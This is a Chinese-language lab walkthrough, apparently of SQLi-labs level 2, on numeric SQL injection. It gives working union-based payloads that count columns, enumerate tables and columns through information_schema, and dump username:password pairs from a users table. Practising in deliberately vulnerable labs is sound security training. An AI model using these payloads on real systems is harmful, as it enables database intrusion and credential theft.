首先我们进入第二关

思路：

1.先判断是什么类型的注入

2.根据类型我们在找注入点

步骤：

1.提示我们输入id数字，那我们先输入1猜一下

2.这里正常回显，当我们后边加上'时可以看到报错，且报错信息看不到数字，所有我们可以猜测sql语句应该是数字型注入

3. 知道时数字型注入后就简单了，和之前第一关的差不多一样

先查库，在查表和列，最后输出显示

?id=1 order by 1

4. 我们就一个一个的试，当输入4时报错不知道第四列

5. 欧克，接下来就是正常操作

?id=-1 union select 1,2,3

6. 我们利用第二个位置开始查

?id=-1 union select 1,database(),3

7. 库名查到就是security

?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27

8. 这不，表名（我们用一下users）就出来了，接下来查一下列名

?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name="users"

9. 这三个已经摆在面前了，那就看一下下里边都有啥

/?id=-1%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20%20users

10用的和第一个数据库一样的，所以里边的内容都是一样的，到这里就结束了。